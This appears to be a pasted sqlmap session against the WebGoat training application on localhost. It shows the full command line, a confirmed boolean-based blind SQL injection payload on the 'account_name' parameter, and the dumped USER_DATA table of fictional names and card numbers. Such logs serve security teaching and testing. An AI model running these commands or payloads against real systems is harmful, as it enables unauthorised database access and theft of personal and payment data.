a guest
Oct 13th, 2015
$ python sqlmap.py -r webgoat.req --current-user --tables --columns -T user_data -D public --dbs --fresh-queries --safe-url "http://localhost:8080/WebGoat/service/restartlesson.mvc" --safe-freq=1 --flush-session --technique=B --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-48619d9}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:57

[12:59:57] [INFO] parsing HTTP request from 'webgoat.req'
[12:59:57] [INFO] flushing session file
[12:59:57] [INFO] testing connection to the target URL
[12:59:57] [INFO] heuristics detected web page charset 'ascii'
[12:59:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:59:57] [INFO] testing if the target URL is stable
[12:59:58] [INFO] target URL is stable
[12:59:58] [INFO] testing if POST parameter 'account_name' is dynamic
[12:59:58] [INFO] confirming that POST parameter 'account_name' is dynamic
[12:59:58] [INFO] POST parameter 'account_name' is dynamic
[12:59:58] [INFO] heuristic (basic) test shows that POST parameter 'account_name' might be injectable (possible DBMS: 'HSQLDB')
[12:59:58] [INFO] heuristic (XSS) test shows that POST parameter 'account_name' might be vulnerable to XSS attacks
[12:59:58] [INFO] testing for SQL injection on POST parameter 'account_name'
it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'HSQLDB' extending provided level (1) and risk (1) values? [Y/n]
[12:59:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:59:59] [WARNING] reflective value(s) found and filtering out
[12:59:59] [INFO] POST parameter 'account_name' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[12:59:59] [INFO] checking if the injection point on POST parameter 'account_name' is a false positive
POST parameter 'account_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 15 HTTP(s) requests:
---
Parameter: account_name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: account_name=Smith' AND 3939=3939 AND 'NMwC'='NMwC&SUBMIT=Go!
---
[12:59:59] [INFO] testing HSQLDB
[12:59:59] [INFO] confirming HSQLDB
[12:59:59] [INFO] the back-end DBMS is HSQLDB
[12:59:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:59:59] [INFO] retrieved:
back-end DBMS: HSQLDB >= 1.7.2 and < 1.8.0
[13:00:00] [INFO] fetching current user
[13:00:00] [INFO] retrieved: SA
current user: 'SA'
[13:00:01] [INFO] fetching database names
[13:00:01] [INFO] fetching number of databases
[13:00:01] [INFO] retrieved: 2
[13:00:01] [INFO] retrieved: INFORMATION_SCHEMA
[13:00:02] [INFO] retrieved: PUBLIC
available databases [2]:
[*] INFORMATION_SCHEMA
[*] PUBLIC

[13:00:02] [INFO] fetching tables for database: 'PUBLIC'
[13:00:02] [INFO] fetching number of tables for database 'PUBLIC'
[13:00:02] [INFO] retrieved: 16
[13:00:02] [INFO] retrieved: AUTH
[13:00:02] [INFO] retrieved: EMPLOYEE
[13:00:03] [INFO] retrieved: MESSAGES
[13:00:03] [INFO] retrieved: MFE_IMAGES
[13:00:04] [INFO] retrieved: OWNERSHIP
[13:00:04] [INFO] retrieved: PINS
[13:00:05] [INFO] retrieved: PRODUCT_SYSTEM_DATA
[13:00:06] [INFO] retrieved: ROLES
[13:00:06] [INFO] retrieved: SALARIES
[13:00:06] [INFO] retrieved: TAN
[13:00:07] [INFO] retrieved: TRANSACTIONS
[13:00:07] [INFO] retrieved: USER_DATA
[13:00:08] [INFO] retrieved: USER_DATA_TAN
[13:00:08] [INFO] retrieved: USER_LOGIN
[13:00:09] [INFO] retrieved: USER_SYSTEM_DATA
[13:00:09] [INFO] retrieved: WEATHER_DATA
Database: PUBLIC
[16 tables]
+---------------------+
| AUTH                |
| EMPLOYEE            |
| MESSAGES            |
| MFE_IMAGES          |
| OWNERSHIP           |
| PINS                |
| PRODUCT_SYSTEM_DATA |
| ROLES               |
| SALARIES            |
| TAN                 |
| TRANSACTIONS        |
| USER_DATA           |
| USER_DATA_TAN       |
| USER_LOGIN          |
| USER_SYSTEM_DATA    |
| WEATHER_DATA        |
+---------------------+

[13:00:10] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
[13:00:10] [INFO] retrieved: 7
[13:00:10] [INFO] retrieved: CC_NUMBER
[13:00:11] [INFO] retrieved: CC_NUMBER
[13:00:11] [INFO] retrieved: CC_TYPE
[13:00:12] [INFO] retrieved: CC_TYPE
[13:00:13] [INFO] retrieved: COOKIE
[13:00:13] [INFO] retrieved: COOKIE
[13:00:14] [INFO] retrieved: FIRST_NAME
[13:00:14] [INFO] retrieved: FIRST_NAME
[13:00:15] [INFO] retrieved: LAST_NAME
[13:00:16] [INFO] retrieved: LAST_NAME
[13:00:16] [INFO] retrieved: LOGIN_COUNT
[13:00:17] [INFO] retrieved: LOGIN_COUNT
[13:00:18] [INFO] retrieved: USERID
[13:00:19] [INFO] retrieved: USERID
Database: PUBLIC
Table: USER_DATA
[7 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| CC_NUMBER   | CC_NUMBER   |
| CC_TYPE     | CC_TYPE     |
| COOKIE      | COOKIE      |
| FIRST_NAME  | FIRST_NAME  |
| LAST_NAME   | LAST_NAME   |
| LOGIN_COUNT | LOGIN_COUNT |
| USERID      | USERID      |
+-------------+-------------+

[13:00:19] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
[13:00:19] [INFO] retrieved: 7
[13:00:19] [INFO] retrieved: CC_NUMBER
[13:00:20] [INFO] retrieved: CC_TYPE
[13:00:21] [INFO] retrieved: COOKIE
[13:00:21] [INFO] retrieved: FIRST_NAME
[13:00:22] [INFO] retrieved: LAST_NAME
[13:00:22] [INFO] retrieved: LOGIN_COUNT
[13:00:23] [INFO] retrieved: USERID
[13:00:24] [INFO] fetching entries for table 'USER_DATA' in database 'PUBLIC'
[13:00:24] [INFO] fetching number of entries for table 'USER_DATA' in database 'PUBLIC'
[13:00:24] [INFO] retrieved: 13
[13:00:24] [INFO] retrieved: 13
[13:00:24] [INFO] retrieved: 13
[13:00:24] [INFO] retrieved: 13
[13:00:24] [INFO] retrieved: 13
[13:00:24] [INFO] retrieved: 13
[13:00:25] [INFO] retrieved: 13
[13:00:25] [INFO] retrieved: 13
[13:00:25] [INFO] retrieved: 33843453533
[13:00:25] [INFO] retrieved: AMEX
[13:00:26] [INFO] retrieved:
[13:00:26] [INFO] retrieved: Joesph
[13:00:26] [INFO] retrieved: Something
[13:00:27] [INFO] retrieved: 0
[13:00:27] [INFO] retrieved: 15613
[13:00:27] [INFO] retrieved: 338893453333
[13:00:28] [INFO] retrieved: AMEX
[13:00:28] [INFO] retrieved:
[13:00:28] [INFO] retrieved: Peter
[13:00:28] [INFO] retrieved: Sand
[13:00:29] [INFO] retrieved: 0
[13:00:29] [INFO] retrieved: 15603
[13:00:29] [INFO] retrieved: 123609789
[13:00:29] [INFO] retrieved: MC
[13:00:30] [INFO] retrieved:
[13:00:30] [INFO] retrieved: Peter
[13:00:30] [INFO] retrieved: Sand
[13:00:30] [INFO] retrieved: 0
[13:00:30] [INFO] retrieved: 15603
[13:00:31] [INFO] retrieved: 33413003333
[13:00:31] [INFO] retrieved: AMEX
[13:00:31] [INFO] retrieved:
[13:00:32] [INFO] retrieved: Grumpy
[13:00:32] [INFO] retrieved: youaretheweakestlink
[13:00:33] [INFO] retrieved: 0
[13:00:33] [INFO] retrieved: 10323
[13:00:33] [INFO] retrieved: 673834489
[13:00:34] [INFO] retrieved: MC
[13:00:34] [INFO] retrieved:
[13:00:34] [INFO] retrieved: Grumpy
[13:00:34] [INFO] retrieved: youaretheweakestlink
[13:00:35] [INFO] retrieved: 0
[13:00:36] [INFO] retrieved: 10323
[13:00:36] [INFO] retrieved: 333300003333
[13:00:36] [INFO] retrieved: AMEX
[13:00:37] [INFO] retrieved:
[13:00:37] [INFO] retrieved: Jolly
[13:00:37] [INFO] retrieved: Hershey
[13:00:37] [INFO] retrieved: 0
[13:00:38] [INFO] retrieved: 10312
[13:00:38] [INFO] retrieved: 176896789
[13:00:38] [INFO] retrieved: MC
[13:00:38] [INFO] retrieved:
[13:00:39] [INFO] retrieved: Jolly
[13:00:39] [INFO] retrieved: Hershey
[13:00:39] [INFO] retrieved: 0
[13:00:39] [INFO] retrieved: 10312
[13:00:40] [INFO] retrieved: 333498703333
[13:00:40] [INFO] retrieved: AMEX
[13:00:41] [INFO] retrieved:
[13:00:41] [INFO] retrieved: Jane
[13:00:41] [INFO] retrieved: Plane
[13:00:41] [INFO] retrieved: 0
[13:00:41] [INFO] retrieved: 103
[13:00:41] [INFO] retrieved: 123456789
[13:00:42] [INFO] retrieved: MC
[13:00:42] [INFO] retrieved:
[13:00:42] [INFO] retrieved: Jane
[13:00:42] [INFO] retrieved: Plane
[13:00:43] [INFO] retrieved: 0
[13:00:43] [INFO] retrieved: 103
[13:00:43] [INFO] retrieved: 4352209902222
[13:00:44] [INFO] retrieved: AMEX
[13:00:44] [INFO] retrieved:
[13:00:44] [INFO] retrieved: John
[13:00:44] [INFO] retrieved: Smith
[13:00:45] [INFO] retrieved: 0
[13:00:45] [INFO] retrieved: 102
[13:00:45] [INFO] retrieved: 2435600002222
[13:00:46] [INFO] retrieved: MC
[13:00:46] [INFO] retrieved:
[13:00:46] [INFO] retrieved: John
[13:00:46] [INFO] retrieved: Smith
[13:00:46] [INFO] retrieved: 0
[13:00:46] [INFO] retrieved: 102
[13:00:47] [INFO] retrieved: 2234200065411
[13:00:47] [INFO] retrieved: MC
[13:00:47] [INFO] retrieved:
[13:00:48] [INFO] retrieved: Joe
[13:00:48] [INFO] retrieved: Snow
[13:00:48] [INFO] retrieved: 0
[13:00:48] [INFO] retrieved: 101
[13:00:48] [INFO] retrieved: 987654321
[13:00:49] [INFO] retrieved: VISA
[13:00:49] [INFO] retrieved:
[13:00:49] [INFO] retrieved: Joe
[13:00:49] [INFO] retrieved: Snow
[13:00:50] [INFO] retrieved: 0
[13:00:50] [INFO] retrieved: 101
[13:00:50] [INFO] analyzing table dump for possible password hashes
Database: PUBLIC
Table: USER_DATA
[13 entries]
+--------+--------+---------+----------------------+---------------+------------+-------------+
| USERID | COOKIE | CC_TYPE | LAST_NAME            | CC_NUMBER     | FIRST_NAME | LOGIN_COUNT |
+--------+--------+---------+----------------------+---------------+------------+-------------+
| 15613  | NULL   | AMEX    | Something            | 33843453533   | Joesph     | 0           |
| 15603  | NULL   | AMEX    | Sand                 | 338893453333  | Peter      | 0           |
| 15603  | NULL   | MC      | Sand                 | 123609789     | Peter      | 0           |
| 10323  | NULL   | AMEX    | youaretheweakestlink | 33413003333   | Grumpy     | 0           |
| 10323  | NULL   | MC      | youaretheweakestlink | 673834489     | Grumpy     | 0           |
| 10312  | NULL   | AMEX    | Hershey              | 333300003333  | Jolly      | 0           |
| 10312  | NULL   | MC      | Hershey              | 176896789     | Jolly      | 0           |
| 103    | NULL   | AMEX    | Plane                | 333498703333  | Jane       | 0           |
| 103    | NULL   | MC      | Plane                | 123456789     | Jane       | 0           |
| 102    | NULL   | AMEX    | Smith                | 4352209902222 | John       | 0           |
| 102    | NULL   | MC      | Smith                | 2435600002222 | John       | 0           |
| 101    | NULL   | MC      | Snow                 | 2234200065411 | Joe        | 0           |
| 101    | NULL   | VISA    | Snow                 | 987654321     | Joe        | 0           |
+--------+--------+---------+----------------------+---------------+------------+-------------+

[13:00:50] [INFO] table 'PUBLIC.USER_DATA' dumped to CSV file '/home/stamparm/.sqlmap/output/localhost/dump/PUBLIC/USER_DATA.csv'
[13:00:50] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/localhost'

[*] shutting down at 13:00:50